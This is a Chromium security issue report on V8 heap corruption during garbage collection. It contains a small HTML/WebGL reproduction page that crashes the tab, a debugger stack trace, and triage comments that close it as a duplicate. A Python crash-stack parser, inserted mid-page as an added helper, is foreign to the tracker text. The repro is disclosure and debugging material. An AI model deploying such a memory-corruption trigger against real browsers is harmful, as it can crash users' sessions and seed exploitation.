
Issue 730576

Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 729298
Closed: Jun 2017
Type: Bug-Security




Security: Memory corruption detected in V8 heap garbage collection

Reported by loobeny...@gmail.com, Jun 7 2017

Issue description


VULNERABILITY DETAILS
	Steps to reproduce:
	
	1. Open V8GcHeapCorruption_repro.html in the Chrome browser.
	2. Windows heap reports a heap corruption in a few minutes:

		Critical error detected c0000374
		(2620.1ab4): Break instruction exception - code 80000003 (first chance)
		(2620.1ab4): Unknown exception - code c0000374 (first chance)
		(2620.1ab4): Unknown exception - code c0000374 (!!! second chance !!!)
		eax=04efe710 ebx=770d5920 ecx=00000001 edx=00000021 esi=00000002 edi=3ec055dc
		eip=77099a8a esp=04efe6ec ebp=04efe77c iopl=0         nv up ei pl zr na pe nc
		cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
		ntdll!RtlReportCriticalFailure+0x88:
		77099a8a eb33            jmp     ntdll!RtlReportCriticalFailure+0xbd (77099abf)



VERSION

	Chromium	61.0.3123.0 (Developer Build) (32-bit) 

	Operating System: Windows 10 

REPRODUCTION CASE  (V8GcHeapCorruption_repro.html)

	<html><body onload="bodayonloadfun()" ><canvas id="test"></canvas></body><script>
	var canvas0=document.getElementById("test");
	var gl = canvas0.getContext("webgl");
	var program = gl.createProgram();
	gl.linkProgram(program);
	gl.useProgram(program);
	var frameBuf0= gl.createFramebuffer(); gl.bindFramebuffer(gl.FRAMEBUFFER, frameBuf0);
	function bodayonloadfun(){var curl = canvas0.toDataURL("image/jpeg",0.6);} 
	setTimeout(function(){location.reload()},100);
	</script></html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION

Type of crash: tab
Crash State: 


	ntdll!RtlReportCriticalFailure+0x88
	ntdll!RtlpReportHeapFailure+0x2f
	ntdll!RtlpHeapHandleError+0x16
	ntdll!RtlpLogHeapFailure+0x9f
	ntdll!RtlFreeHeap+0x54617
	chrome_child!base::allocator::WinHeapFree(void * ptr = 0x3ec055dc)+0x19 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\winheap_stubs_win.cc @ 43] 
	chrome_child!`anonymous namespace'::DefaultWinHeapFreeImpl(struct base::allocator::AllocatorDispatch * __formal = 0x65e049f0, void * address = 0x3ec055dc, void * context = 0x00000000)+0xb [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim_default_dispatch_to_winheap.cc @ 54] 
	chrome_child!ShimFree+0x10 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim.cc @ 264] 
	chrome_child!free(void * ptr = 0x3ec055dc)+0x13 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim_override_ucrt_symbols_win.h @ 55] 
	chrome_child!v8::String::ExternalStringResourceBase::`scalar deleting destructor'(void)+0x18
	chrome_child!v8::String::ExternalStringResourceBase::Dispose(void)+0xa [c:\b\c\b\win_syzyasan_lkgr\src\v8\include\v8.h @ 2529] 
	chrome_child!v8::internal::Heap::FinalizeExternalString+0xe [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 450] 
	chrome_child!v8::internal::ExternalStringTableCleaner::VisitRootPointers(v8::internal::Root root = kExternalStringsTable (0n1), class v8::internal::Object ** start = 0x08575448, class v8::internal::Object ** end = 0x08575450)+0x7d [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 1313] 
	chrome_child!v8::internal::Heap::ExternalStringTable::IterateNewSpaceStrings+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 707] 
	chrome_child!v8::internal::Heap::ExternalStringTable::IterateAll+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 713] 
	chrome_child!v8::internal::MarkCompactCollector::ClearNonLiveReferences(void)+0x267 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 2989] 
	chrome_child!v8::internal::MarkCompactCollector::CollectGarbage(void)+0x1f [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 481] 
	chrome_child!v8::internal::Heap::MarkCompact(void)+0x67 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1494] 
	chrome_child!v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector collector = MARK_COMPACTOR (0n1), v8::GCCallbackFlags gc_callback_flags = kGCCallbackFlagCollectAllAvailableGarbage (0n16))+0x30e [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1358] 
	chrome_child!v8::internal::Heap::CollectGarbage(v8::internal::GarbageCollector collector = MARK_COMPACTOR (0n1), v8::internal::GarbageCollectionReason gc_reason = kMemoryPressure (0n16), char * collector_reason = 0x654f8ef4 "GC in old space requested", v8::GCCallbackFlags gc_callback_flags = kGCCallbackFlagCollectAllAvailableGarbage (0n16))+0x248 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap.cc @ 1030] 

Attachment: V8GcHeapCorruption_repro.html (473 bytes)
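As an added triage helper, not part of this report or of Chromium: the script below parses the WinDbg-style exception banner and the "Crash State" stack above into structured frames, names the NTSTATUS codes in the banner (0xC0000374 is STATUS_HEAP_CORRUPTION, 0x80000003 is STATUS_BREAKPOINT), skips the ntdll and allocator-shim plumbing to find the frame that actually issued the bad free, extracts the freed pointer from the shim's argument list, and notes that the free ran under the mark-compact collector. The embedded sample is a constructed excerpt of the stack from this issue; the plumbing markers are the script's own heuristics and assume Chromium's `base::allocator` shim naming as it appears in the trace.

```python
"""Triage helper for a WinDbg-style crash stack such as the one in this report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known NTSTATUS values that appear in the exception banner.
NTSTATUS_NAMES = {
    0xC0000374: "STATUS_HEAP_CORRUPTION",
    0x80000003: "STATUS_BREAKPOINT",
}

# Heuristic (assumption): frames in these modules or matching these markers are
# heap plumbing, not the code that owns the bad free.
PLUMBING_MODULES = {"ntdll"}
PLUMBING_MARKERS = ("base::allocator", "ShimFree", "WinHeapFree", "free(void")

# Constructed sample: the exception lines and the top of the "Crash State"
# stack from this report, trimmed to the frames needed for triage.
SAMPLE_REPORT = r"""
(2620.1ab4): Break instruction exception - code 80000003 (first chance)
(2620.1ab4): Unknown exception - code c0000374 (!!! second chance !!!)
ntdll!RtlReportCriticalFailure+0x88
ntdll!RtlpReportHeapFailure+0x2f
ntdll!RtlFreeHeap+0x54617
chrome_child!base::allocator::WinHeapFree(void * ptr = 0x3ec055dc)+0x19 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\winheap_stubs_win.cc @ 43]
chrome_child!ShimFree+0x10 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim.cc @ 264]
chrome_child!free(void * ptr = 0x3ec055dc)+0x13 [c:\b\c\b\win_syzyasan_lkgr\src\base\allocator\allocator_shim_override_ucrt_symbols_win.h @ 55]
chrome_child!v8::String::ExternalStringResourceBase::`scalar deleting destructor'(void)+0x18
chrome_child!v8::String::ExternalStringResourceBase::Dispose(void)+0xa [c:\b\c\b\win_syzyasan_lkgr\src\v8\include\v8.h @ 2529]
chrome_child!v8::internal::Heap::FinalizeExternalString+0xe [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\heap-inl.h @ 450]
chrome_child!v8::internal::MarkCompactCollector::ClearNonLiveReferences(void)+0x267 [c:\b\c\b\win_syzyasan_lkgr\src\v8\src\heap\mark-compact.cc @ 2989]
"""


@dataclass
class Frame:
    module: str
    function: str
    offset: int
    path: Optional[str] = None
    line: Optional[int] = None


# module!function+0xOFFSET [source path @ line]   (source part is optional)
FRAME_RE = re.compile(
    r"^(?P<module>\w+)!(?P<function>.+?)\+0x(?P<offset>[0-9a-fA-F]+)"
    r"(?:\s+\[(?P<path>.+?)\s+@\s+(?P<line>\d+)\])?$"
)
CODE_RE = re.compile(r"\bcode ([0-9a-fA-F]{8})\b")
PTR_RE = re.compile(r"\bptr = 0x([0-9a-fA-F]+)")


def parse_frames(report: str) -> List[Frame]:
    """Turn every stack line of the report into a Frame; banner lines are skipped."""
    frames = []
    for raw in report.splitlines():
        m = FRAME_RE.match(raw.strip())
        if m:
            frames.append(Frame(m["module"], m["function"], int(m["offset"], 16),
                                m["path"], int(m["line"]) if m["line"] else None))
    return frames


def status_names(report: str) -> List[str]:
    """Map each 'code XXXXXXXX' in the exception banner to its NTSTATUS name."""
    names = []
    for hex_code in CODE_RE.findall(report):
        code = int(hex_code, 16)
        names.append(NTSTATUS_NAMES.get(code, f"unknown NTSTATUS 0x{code:08X}"))
    return names


def is_plumbing(frame: Frame) -> bool:
    if frame.module.lower() in PLUMBING_MODULES:
        return True
    return any(marker in frame.function for marker in PLUMBING_MARKERS)


def first_owning_frame(frames: List[Frame]) -> Optional[Frame]:
    """First frame above the heap/allocator wrappers: the code that issued the free."""
    return next((f for f in frames if not is_plumbing(f)), None)


def freed_pointer(frames: List[Frame]) -> Optional[str]:
    """The pointer handed to the allocator shim, as printed in the frame arguments."""
    for f in frames:
        m = PTR_RE.search(f.function)
        if m:
            return "0x" + m.group(1).lower()
    return None


def in_garbage_collection(frames: List[Frame]) -> bool:
    return any("MarkCompactCollector" in f.function or "::Heap::" in f.function
               for f in frames)


def triage(report: str) -> Dict[str, object]:
    frames = parse_frames(report)
    owner = first_owning_frame(frames)
    return {
        "status": status_names(report),
        "frames": len(frames),
        "owning_function": owner.function if owner else None,
        "freed_pointer": freed_pointer(frames),
        "during_gc": in_garbage_collection(frames),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

On the sample the owning frame resolves to the `ExternalStringResourceBase` deleting destructor reached from `Heap::FinalizeExternalString` under the mark-compact collector, which is the same place a human reader lands when reading the trace by hand; the value of the script is that it produces that answer consistently across many crash reports of the same shape.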
Components: Blink>JavaScript
Looks similar to Issue 729298?
Owner: hpayer@chromium.org
Status: Assigned (was: Unconfirmed)
yes, I think that's indeed a duplicate
Mergedinto: 729298
Status: Duplicate (was: Assigned)

Comment 4 by sheriffbot@chromium.org, Sep 19 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
